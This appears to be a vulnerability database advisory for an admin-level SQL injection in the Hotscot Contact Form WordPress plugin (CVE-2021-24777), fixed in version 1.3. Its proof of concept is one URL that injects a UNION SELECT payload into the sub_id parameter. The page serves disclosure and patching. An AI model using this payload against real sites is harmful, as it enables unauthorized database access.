Hotscot Contact Form < 1.3 – Admin+ SQL Injection | CVE 2021-24777 | Plugin Vulnerabilities

Description

The view submission functionality in the plugin makes a get request with the sub_id parameter which not sanitised, escaped or validated before inserting to a SQL statement, leading to an SQL injection.

Proof of Concept

https://example.com/wp-admin/admin.php?page=hcf_contact&view_form_sub_id=1&sub_id=-7795%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,user(),NULL-- HTTP/1.1

Affects Plugins

hotscot-contact-form

Fixed in 1.3

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Syed Sheeraz Ali of Codevigilant

Verified

Yes

WPVDB ID

2dfde2ef-1b33-4dc9-aa3e-02d319effb3a

Timeline

Publicly Published

2021-05-13 (about 3 years ago)

Added

2022-02-14 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2021-07-24

Title

Diary & Availability Calendar <= 1.0.3 - Authenticated (subscriber+) SQL Injection

Published

2024-04-12

Title

BWL Advanced FAQ Manager < 2.0.4 - Authenticated (Administrator+) SQL Injection

Published

2023-08-10

Title

Fusion Builder < 3.11.2 - Subscriber+ SQL injection and broken access control vulnerability in Critical CSS

Published

2021-10-20

Title

Download Monitor < 4.4.5 - Admin+ SQL Injection

Published

2014-08-01

Title

CevherShare 2.0 - SQL Injection